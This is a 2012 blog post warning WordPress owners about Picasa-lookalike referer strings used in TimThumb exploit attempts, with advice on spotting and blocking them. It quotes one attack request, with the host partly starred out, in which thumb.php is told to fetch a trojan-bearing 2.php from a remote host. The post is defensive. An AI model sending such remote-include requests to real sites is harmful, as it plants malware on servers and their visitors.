Picasa Spoofed for Malware Injection
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
Any query string repeating www. is suspicious, although it way have been a user error – often by copy/pasting a link without fully overwriting the existing address, but then at least the first www reference will normally be your blog or website (or a page on it). If a search engne has indexed something like this resulting in a broken link to your site – whoever posted the link probably made a mistake, and it should be re-directed to a suitable page
Spam Comments lead to Infected SItes
The cript injection example could also be modified to ditrect vistors to sites of this nature by comment spammers. Should Comemnt Spammer succeed in leaving a comment, the link could lead to a website with malware – Viruses or Trojans. I have found several of these malware containing websites the past few weeks. This is another good example of the dangers of comment spam. Spammers are no longer simply trying to SEO their websites through backlinks, they are targeting visitors to the websites and blogs the links are posted on – to infect these visitor’s computers with malware.
PHP File Extensions in Lookup String
The referer string may contain a link to a PHP file – These are active server files (like WordPress uses) and should never be contained in a referer URL string. When these are found, they show a clear attempt to inject malware into your site or blog.
Referrer urls and get requests should seldom use an active file extension – e.g. php as the extension is not required to serve the page. Once again treat GET requests for php files as suspicious UNLESS these are created when you are logged in and editing content or other on-site activities.
Posted on March 7, 2012, in General News, Internet Security, Malware and tagged Comment Spam, Hacking, Internet, malware, Security Risks, spam, Website, WordPress. Bookmark the permalink. Leave a comment.